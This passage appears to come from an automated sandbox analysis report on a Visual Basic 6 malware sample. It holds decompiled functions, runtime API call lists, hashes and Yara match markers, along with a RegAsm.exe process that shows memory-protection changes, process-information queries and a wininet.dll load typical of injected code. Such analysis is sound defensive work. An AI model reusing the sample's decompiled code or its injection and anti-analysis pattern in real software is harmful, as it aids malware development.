__vbaFreeStr.MSVBVM60(0040EED5,Double,00000000,00000005), ref: 0040EECF

Strings

Double, xrefs: 0040ECCC

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#591#596CheckChkstkHresultListNew2
String ID: Double
API String ID: 3707479433-3712743385
Opcode ID: 7df8648674d81be3d6759bb3217627588071b0722b173c0b13e53b39f6ab1595
Instruction ID: d2e008e22dfeb8fe162234c09e62c9cda6a5d58f37201cfaa55412e15ca0f5e2
Opcode Fuzzy Hash: 7df8648674d81be3d6759bb3217627588071b0722b173c0b13e53b39f6ab1595
Instruction Fuzzy Hash: 6651F9B194021DDBDB21DF91D945BDEB7B8FF08304F1081AAE109B71A1DBB85A89CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1D5, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040E1D5(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a40, void* _a48) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v40;
				void* _v56;
				void* _v60;
				char _v76;
				char* _v100;
				char _v108;
				intOrPtr _v116;
				char _v124;
				signed int _v128;
				signed int _v136;
				signed int _t42;
				signed int _t43;
				intOrPtr _t65;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t65;
				_push(0x74);
				L004012A0();
				_v12 = _t65;
				_v8 = 0x4011e8;
				L004013E4();
				L00401420();
				L004013E4();
				L00401420();
				_v100 =  &_v24;
				_v108 = 0x4008;
				_push(1);
				_push( &_v108);
				_push( &_v76);
				L0040138A();
				_v116 = 0x40b130;
				_v124 = 0x8008;
				_push( &_v76);
				_t42 =  &_v124;
				_push(_t42);
				L004013F0();
				_v128 = _t42;
				L00401450();
				_t43 = _v128;
				if(_t43 != 0) {
					_t43 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
					_v128 = _t43;
					if(_v128 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x718);
						_push(0x40ad7c);
						_push(_a4);
						_push(_v128);
						L004013D8();
						_v136 = _t43;
					}
				}
				_push(E0040E2F1);
				L00401462();
				L00401450();
				L00401450();
				L00401462();
				return _t43;
			}

0x0040e1da
0x0040e1e5
0x0040e1e6
0x0040e1ed
0x0040e1f0
0x0040e1f8
0x0040e1fb
0x0040e208
0x0040e213
0x0040e21e
0x0040e22b
0x0040e233
0x0040e236
0x0040e23d
0x0040e242
0x0040e246
0x0040e247
0x0040e24c
0x0040e253
0x0040e25d
0x0040e25e
0x0040e261
0x0040e262
0x0040e267
0x0040e26e
0x0040e273
0x0040e279
0x0040e283
0x0040e289
0x0040e290
0x0040e2af
0x0040e292
0x0040e292
0x0040e297
0x0040e29c
0x0040e29f
0x0040e2a2
0x0040e2a7
0x0040e2a7
0x0040e290
0x0040e2b6
0x0040e2d3
0x0040e2db
0x0040e2e3
0x0040e2eb
0x0040e2f0

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E1F0
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E208
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E213
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040E21E
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E22B
#619.MSVBVM60(?,00004008,00000001), ref: 0040E247
__vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E262
__vbaFreeVar.MSVBVM60(?,?,?,00004008,00000001), ref: 0040E26E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040AD7C,00000718), ref: 0040E2A2
__vbaFreeStr.MSVBVM60(0040E2F1,?,?,?,00004008,00000001), ref: 0040E2D3
__vbaFreeVar.MSVBVM60(0040E2F1,?,?,?,00004008,00000001), ref: 0040E2DB
__vbaFreeVar.MSVBVM60(0040E2F1,?,?,?,00004008,00000001), ref: 0040E2E3
__vbaFreeStr.MSVBVM60(0040E2F1,?,?,?,00004008,00000001), ref: 0040E2EB

Strings

ABC, xrefs: 0040E223

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Copy$#619CheckChkstkHresult
String ID: ABC
API String ID: 4030740960-2743272264
Opcode ID: 71565496e1013d3dc358959193418263f78627d4823f4fdbabbb7d6b31edaf51
Instruction ID: 099bff530df38aeac2cf3fb0fcebc787d1f0c53139f4b35bca21928c1acb4e06
Opcode Fuzzy Hash: 71565496e1013d3dc358959193418263f78627d4823f4fdbabbb7d6b31edaf51
Instruction Fuzzy Hash: F331C871800208ABDB10EFA1C986ADDBBB8EF04748F50447EF505B71E2DB786A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E304, Relevance: 18.1, APIs: 12, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040E304(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v12;
				long long* _v16;
				char _v44;
				char _v48;
				intOrPtr _v56;
				char _v64;
				intOrPtr _v72;
				char _v80;
				void* _v116;
				signed int _v120;
				signed int _v124;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				signed char _v148;
				signed long long _v156;
				signed long long _v160;
				signed int _v164;
				signed int* _t60;
				char* _t67;
				char* _t71;
				signed int _t75;
				signed char _t76;
				signed int _t80;
				intOrPtr _t86;
				void* _t92;
				long long* _t93;
				void* _t94;
				intOrPtr* _t95;
				signed long long _t98;
				signed long long _t100;

				_t93 = _t92 - 0xc;
				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L004012A0();
				_v16 = _t93;
				_v12 = 0x401210;
				_t60 = _a8;
				 *_t60 =  *_t60 & 0x00000000;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_push( &_v80);
				_push( &_v64);
				_t98 =  *0x401208;
				 *_t93 = _t98;
				asm("fld1");
				 *_t93 = _t98;
				asm("fld1");
				 *_t93 = _t98;
				L0040137E();
				L00401384();
				asm("fcomp qword [0x401200]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t60 == 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_v136 = 1;
				}
				_v116 =  ~_v136;
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401432();
				_t94 = _t93 + 0xc;
				_t67 = _v116;
				if(_t67 == 0) {
					L16:
					asm("wait");
					_push(E0040E540);
					return _t67;
				} else {
					if( *0x410010 != 0) {
						_v140 = 0x410010;
					} else {
						_push(0x410010);
						_push(0x40a4c4);
						L004013DE();
						_v140 = 0x410010;
					}
					_t86 =  *((intOrPtr*)( *_v140));
					_t71 =  &_v44;
					L004013CC();
					_v116 = _t71;
					_t75 =  *((intOrPtr*)( *_v116 + 0x58))(_v116,  &_v48, _t71,  *((intOrPtr*)(_t86 + 0x31c))( *_v140));
					asm("fclex");
					_v120 = _t75;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40b0c8);
						_push(_v116);
						_push(_v120);
						L004013D8();
						_v144 = _t75;
					}
					_push(0);
					_push(0);
					_push(_v48);
					_t76 =  &_v64;
					_push(_t76);
					L004013BA();
					_t95 = _t94 + 0x10;
					_push(_t76);
					L004013B4();
					_v148 = _t76;
					asm("fild dword [ebp-0x90]");
					_v156 = _t98;
					_t100 = _v156 *  *0x4011f8;
					asm("fnstsw ax");
					if((_t76 & 0x0000000d) != 0) {
						goto L1;
					} else {
						_v160 = _t100;
						 *_t95 = _v160;
						_t80 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, _t86);
						asm("fclex");
						_v124 = _t80;
						if(_v124 >= 0) {
							_v164 = _v164 & 0x00000000;
						} else {
							_push(0x84);
							_push(0x40ad4c);
							_push(_a4);
							_push(_v124);
							L004013D8();
							_v164 = _t80;
						}
						_push( &_v48);
						_t67 =  &_v44;
						_push(_t67);
						_push(2);
						L004013C6();
						L00401450();
						goto L16;
					}
				}
				L1:
				return __imp____vbaFPException();
			}

0x0040e307
0x0040e30a
0x0040e315
0x0040e316
0x0040e322
0x0040e32a
0x0040e32d
0x0040e334
0x0040e337
0x0040e33a
0x0040e341
0x0040e348
0x0040e34f
0x0040e359
0x0040e35d
0x0040e35e
0x0040e366
0x0040e369
0x0040e36d
0x0040e370
0x0040e374
0x0040e377
0x0040e37c
0x0040e381
0x0040e387
0x0040e389
0x0040e38a
0x0040e398
0x0040e38c
0x0040e38c
0x0040e38c
0x0040e3a7
0x0040e3ae
0x0040e3b2
0x0040e3b3
0x0040e3b5
0x0040e3ba
0x0040e3bd
0x0040e3c3
0x0040e500
0x0040e500
0x0040e501
0x00000000
0x0040e3c9
0x0040e3d0
0x0040e3ed
0x0040e3d2
0x0040e3d2
0x0040e3d7
0x0040e3dc
0x0040e3e1
0x0040e3e1
0x0040e407
0x0040e411
0x0040e415
0x0040e41a
0x0040e429
0x0040e42c
0x0040e42e
0x0040e435
0x0040e451
0x0040e437
0x0040e437
0x0040e439
0x0040e43e
0x0040e441
0x0040e444
0x0040e449
0x0040e449
0x0040e458
0x0040e45a
0x0040e45c
0x0040e45f
0x0040e462
0x0040e463
0x0040e468
0x0040e46b
0x0040e46c
0x0040e471
0x0040e477
0x0040e47d
0x0040e489
0x0040e48f
0x0040e493
0x00000000
0x0040e499
0x0040e499
0x0040e4a6
0x0040e4b1
0x0040e4b7
0x0040e4b9
0x0040e4c0
0x0040e4df
0x0040e4c2
0x0040e4c2
0x0040e4c7
0x0040e4cc
0x0040e4cf
0x0040e4d2
0x0040e4d7
0x0040e4d7
0x0040e4e9
0x0040e4ea
0x0040e4ed
0x0040e4ee
0x0040e4f0
0x0040e4fb
0x00000000
0x0040e4fb
0x0040e493
0x004012ac
0x004012ac

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E322
#677.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E377
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A), ref: 0040E37C
__vbaFreeVarList.MSVBVM60(00000002,0000000A,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0040E3B5
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,004012A6), ref: 0040E3DC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E415
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0C8,00000058), ref: 0040E444
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040E463
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,004012A6), ref: 0040E46C
__vbaHresultCheckObj.MSVBVM60(00000000,00401210,0040AD4C,00000084), ref: 0040E4D2
__vbaFreeObjList.MSVBVM60(00000002,?,00000000), ref: 0040E4F0
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,004012A6), ref: 0040E4FB

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultList$#677CallChkstkLateNew2
String ID:
API String ID: 1795533351-0
Opcode ID: ccda8b0d965d439e9fdf8f9c2eb320d0a6cb3ca558405643cef36543f41a60fc
Instruction ID: b75478f4a90bec07bbcac2d02c7b30a53e30e49f02a6331cbab462c82e3d89fa
Opcode Fuzzy Hash: ccda8b0d965d439e9fdf8f9c2eb320d0a6cb3ca558405643cef36543f41a60fc
Instruction Fuzzy Hash: 62513971900218EFDB20EFA1CC45BEDBBB8BB04704F1085AAF549B72A1DB7859949F19

Uniqueness

Uniqueness Score: -1.00%

Function 0040EEFC, Relevance: 15.1, APIs: 10, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040EEFC(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				intOrPtr* _v88;
				signed int _v92;
				char* _t35;
				signed int _t39;
				intOrPtr _t58;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_push(0x48);
				L004012A0();
				_v12 = _t58;
				_v8 = 0x401278;
				L004013E4();
				L004013E4();
				if( *0x410010 != 0) {
					_v88 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a4c4);
					L004013DE();
					_v88 = 0x410010;
				}
				_t35 =  &_v56;
				L004013CC();
				_v76 = _t35;
				_v64 = 1;
				_v72 = 2;
				L004012A0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t39 =  *((intOrPtr*)( *_v76 + 0x17c))(_v76, 0x10, _t35,  *((intOrPtr*)( *((intOrPtr*)( *_v88)) + 0x314))( *_v88));
				asm("fclex");
				_v80 = _t39;
				if(_v80 >= 0) {
					_v92 = _v92 & 0x00000000;
				} else {
					_push(0x17c);
					_push(0x40b0b8);
					_push(_v76);
					_push(_v80);
					L004013D8();
					_v92 = _t39;
				}
				L004013D2();
				_push(E0040F006);
				L00401450();
				L00401450();
				return _t39;
			}

0x0040ef01
0x0040ef0c
0x0040ef0d
0x0040ef14
0x0040ef17
0x0040ef1f
0x0040ef22
0x0040ef2f
0x0040ef3a
0x0040ef46
0x0040ef60
0x0040ef48
0x0040ef48
0x0040ef4d
0x0040ef52
0x0040ef57
0x0040ef57
0x0040ef7b
0x0040ef7f
0x0040ef84
0x0040ef87
0x0040ef8e
0x0040ef98
0x0040efa2
0x0040efa3
0x0040efa4
0x0040efa5
0x0040efae
0x0040efb4
0x0040efb6
0x0040efbd
0x0040efd9
0x0040efbf
0x0040efbf
0x0040efc4
0x0040efc9
0x0040efcc
0x0040efcf
0x0040efd4
0x0040efd4
0x0040efe0
0x0040efe5
0x0040eff8
0x0040f000
0x0040f005

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EF17
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EF2F
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EF3A
__vbaNew2.MSVBVM60(0040A4C4,00410010,?,?,?,?,004012A6), ref: 0040EF52
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EF7F
__vbaChkstk.MSVBVM60(?,00000000), ref: 0040EF98
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B0B8,0000017C), ref: 0040EFCF
__vbaFreeObj.MSVBVM60 ref: 0040EFE0
__vbaFreeVar.MSVBVM60(0040F006), ref: 0040EFF8
__vbaFreeVar.MSVBVM60(0040F006), ref: 0040F000

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Chkstk$CheckHresultNew2
String ID:
API String ID: 2096563423-0
Opcode ID: e2fbf2e67580c8d33c9fa56ecbae4cca6337a2c826eec48dac8d1ad85c31a6cf
Instruction ID: dfcfbea2610b4f68fa9b4312d2e1e7c6eb7f2483d60fd4f0777bde3485da4b81
Opcode Fuzzy Hash: e2fbf2e67580c8d33c9fa56ecbae4cca6337a2c826eec48dac8d1ad85c31a6cf
Instruction Fuzzy Hash: 7D31F970910208AFDB10EF91D846BDDBBB5AF08708F60447AF405BB2E1D7BD6949CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7AF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E7AF(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				signed int _v32;
				signed int _v44;
				signed int _t26;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t40 = _t39 - 0xc;
				 *[fs:0x0] = _t40;
				L004012A0();
				_v16 = _t40;
				_v12 = 0x401230;
				_v8 = 0;
				_t26 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x4012a6, _t37);
				L00401420();
				_push(0);
				_push(0xffffffff);
				_push(1);
				_push(0);
				_push(0x40b190);
				_push(_v28);
				L00401366();
				L0040145C();
				_push(_v28);
				_push(0x40b198);
				L00401360();
				if(_t26 != 0) {
					_t26 =  *((intOrPtr*)( *_a4 + 0x718))(_a4);
					_v32 = _t26;
					if(_v32 >= 0) {
						_v44 = _v44 & 0x00000000;
					} else {
						_push(0x718);
						_push(0x40ad7c);
						_push(_a4);
						_push(_v32);
						L004013D8();
						_v44 = _t26;
					}
				}
				_push(E0040E86F);
				L00401462();
				return _t26;
			}

0x0040e7b2
0x0040e7c1
0x0040e7cb
0x0040e7d3
0x0040e7d6
0x0040e7dd
0x0040e7ec
0x0040e7f7
0x0040e7fc
0x0040e7fe
0x0040e800
0x0040e802
0x0040e804
0x0040e809
0x0040e80c
0x0040e816
0x0040e81b
0x0040e81e
0x0040e823
0x0040e82a
0x0040e834
0x0040e83a
0x0040e841
0x0040e85d
0x0040e843
0x0040e843
0x0040e848
0x0040e84d
0x0040e850
0x0040e853
0x0040e858
0x0040e858
0x0040e841
0x0040e861
0x0040e869
0x0040e86e

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040E7CB
__vbaStrCopy.MSVBVM60(?,?,?,?,004012A6), ref: 0040E7F7
#712.MSVBVM60(?,0040B190,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E80C
__vbaStrMove.MSVBVM60(?,0040B190,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E816
__vbaStrCmp.MSVBVM60(0040B198,?,?,0040B190,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E823
__vbaHresultCheckObj.MSVBVM60(00000000,00401230,0040AD7C,00000718), ref: 0040E853
__vbaFreeStr.MSVBVM60(0040E86F,0040B198,?,?,0040B190,00000000,00000001,000000FF,00000000,?,?,?,?,004012A6), ref: 0040E869

Strings

cer, xrefs: 0040E7EF

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#712CheckChkstkCopyFreeHresultMove
String ID: cer
API String ID: 1147057769-324084633
Opcode ID: 878bb9af14eac2b697248ba02f20a56cfdb458f1574de3a75c524af4fa0877aa
Instruction ID: b4ad758610578bd57d5caf36a1354fe877a8a8faab84311659edfbda664d4365
Opcode Fuzzy Hash: 878bb9af14eac2b697248ba02f20a56cfdb458f1574de3a75c524af4fa0877aa
Instruction Fuzzy Hash: BA110A31940209AFDB00AFA6C846F9E7FB4EF04794F50847AB505BB2E1DB7895518B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F019, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040F019(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				intOrPtr _v116;
				char _v124;
				short _v128;
				short _t30;
				short _t33;
				void* _t37;
				void* _t39;
				intOrPtr _t40;

				_t40 = _t39 - 0xc;
				 *[fs:0x0] = _t40;
				L004012A0();
				_v16 = _t40;
				_v12 = 0x401288;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4012a6, _t37);
				 *_a8 =  *_a8 & 0x00000000;
				_v52 = 0x20;
				_v60 = 2;
				_push( &_v60);
				_push(1);
				_push( &_v76);
				L0040133C();
				_v116 = 0x40b220;
				_v124 = 0x8008;
				_push( &_v76);
				_t30 =  &_v124;
				_push(_t30);
				L004013F0();
				_v128 = _t30;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L00401432();
				_t33 = _v128;
				if(_t33 != 0) {
					_push(0x42);
					L00401336();
					_v44 = _t33;
				}
				_push(E0040F0F0);
				return _t33;
			}

0x0040f01c
0x0040f02b
0x0040f035
0x0040f03d
0x0040f040
0x0040f047
0x0040f056
0x0040f05c
0x0040f05f
0x0040f066
0x0040f070
0x0040f071
0x0040f076
0x0040f077
0x0040f07c
0x0040f083
0x0040f08d
0x0040f08e
0x0040f091
0x0040f092
0x0040f097
0x0040f09e
0x0040f0a2
0x0040f0a3
0x0040f0a5
0x0040f0ad
0x0040f0b3
0x0040f0b5
0x0040f0b7
0x0040f0bc
0x0040f0bc
0x0040f0bf
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040F035
#607.MSVBVM60(?,00000001,00000002), ref: 0040F077
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F092
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,00008008,?), ref: 0040F0A5
#570.MSVBVM60(00000042,?,?,004012A6), ref: 0040F0B7

Strings

, xrefs: 0040F05F

Memory Dump Source

Source File: 00000000.00000002.317995664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.317991601.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.318011616.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.318026723.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#570#607ChkstkFreeList
String ID:
API String ID: 1644359802-3916222277
Opcode ID: 36bba73c1d298c0fe7875d6b8f2ff0cbb8275ad566d9047be5ceeb84f53c8c62
Instruction ID: 0edba942b7645573c804211669df9372795e7154edc6f59849db0fd59b67edfa
Opcode Fuzzy Hash: 36bba73c1d298c0fe7875d6b8f2ff0cbb8275ad566d9047be5ceeb84f53c8c62
Instruction Fuzzy Hash: 4F11B9B1900208ABDB10DFE5D846BDEBBB8FF04704F54807AF904FB692D77895498B99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 6900 Parent PID: 5420 RegAsm.exeCOMMON

Executed Functions

Function 013A2B99, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,013A33C9,013A36CB,?,?,?,?,?,013A34A5), ref: 013A32E2

Strings

wininet.dll, xrefs: 013A32C7

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID: wininet.dll
API String ID: 2994545307-3354682871
Opcode ID: be9e3f6292cc5f51d13ef1a53ed590e88e5a1b1ed08b062bd57ee3363ca9cede
Instruction ID: 6c11ed0d32872c351f7dc96c80055edeea29203a6c703cbcaba58bf1807bb8e0
Opcode Fuzzy Hash: be9e3f6292cc5f51d13ef1a53ed590e88e5a1b1ed08b062bd57ee3363ca9cede
Instruction Fuzzy Hash: 7AD0222100E3C90EC212BB3044AA202BF34FA22245788C0CFC081426A3CF08151AEBE3

Uniqueness

Uniqueness Score: -1.00%

Function 013A5242, Relevance: 1.9, APIs: 1, Instructions: 370nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,013A4F83,00000040,013A1D51,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 013A52A7

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3db4be114bbfb1cd9e29eb3afe45f709a557d803a469fe8205f5e1b2813b15fe
Instruction ID: 3af39d56996128ab51cfbf3021c360b3bf5d48b2abff0159170aa0bd9e4f1bd6
Opcode Fuzzy Hash: 3db4be114bbfb1cd9e29eb3afe45f709a557d803a469fe8205f5e1b2813b15fe
Instruction Fuzzy Hash: FA817BA115E6806EE7098368EC5AFB33BADDB6321CFC8429EF5C6CB593D04598064731

Uniqueness

Uniqueness Score: -1.00%

Function 013A5705, Relevance: 1.6, APIs: 1, Instructions: 93nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 56764fdf1bdaf57b172202e43ce17ca77f7f25240e1229612c5665d08e707a98
Instruction ID: 64c0e2435ec2cfd3ef392ca083b1077f9b36be5aef031336b306dab89e280aeb
Opcode Fuzzy Hash: 56764fdf1bdaf57b172202e43ce17ca77f7f25240e1229612c5665d08e707a98
Instruction Fuzzy Hash: 81212930205605EEEB194B1CC8197B63BA9EB0333CFD8435DD945AF9A2D33584C4CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013A56A6, Relevance: 1.6, APIs: 1, Instructions: 88nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 51d72312bad3733c696d5d9e1f46d04d231fb84d245d9bcdd961ef3e0e3a337d
Instruction ID: 26742f52ce61916e409b55d9f69391c67646a79988a1910a929d59e2a4db7cf8
Opcode Fuzzy Hash: 51d72312bad3733c696d5d9e1f46d04d231fb84d245d9bcdd961ef3e0e3a337d
Instruction Fuzzy Hash: 9C310431600609DEEB2A8E2CC4483A87BA2EB4333CFD9535EC9429A9E5D33484C4C742

Uniqueness

Uniqueness Score: -1.00%

Function 013A57A2, Relevance: 1.6, APIs: 1, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 249a3e16d258c8c7cdfc36e6ecd30ba85cef0c16761b4e51cd28e411cdea7b8a
Instruction ID: 034c4ec2a6c2fb66c59d82e3418e6b83bf5a13b0382115266ebc3bf7972962db
Opcode Fuzzy Hash: 249a3e16d258c8c7cdfc36e6ecd30ba85cef0c16761b4e51cd28e411cdea7b8a
Instruction Fuzzy Hash: CD213A6025A301AEEA1D4658C81E7F32FACDB0313CFD8834EED45AE927D33240C48A22

Uniqueness

Uniqueness Score: -1.00%

Function 013A581B, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,013A34A5,?,013A34C2,?,013A33B4,?,013A1DF5,?,?,?,?,?), ref: 013A5964

Memory Dump Source

Source File: 0000000C.00000002.482428270.00000000013A1000.00000040.00000001.sdmp, Offset: 013A1000, based on PE: false

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 7ec2bc82d7875070943d5496ef8e221aeecb829959fdbacf9245c0403ed008f5
Instruction ID: 97175d3ce0517b8ec4b095cf42911216e26df6e8ef29b6a7f19a27372f58723b
Opcode Fuzzy Hash: 7ec2bc82d7875070943d5496ef8e221aeecb829959fdbacf9245c0403ed008f5
Instruction Fuzzy Hash: DD11496171A606ADEB1E5B2C89197F62F6DCF2313CFDC434DE985DE963D22145888222

Uniqueness

Uniqueness Score: -1.00%

Function 013A19DC, Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 013A1A2B

Memory Dump Source

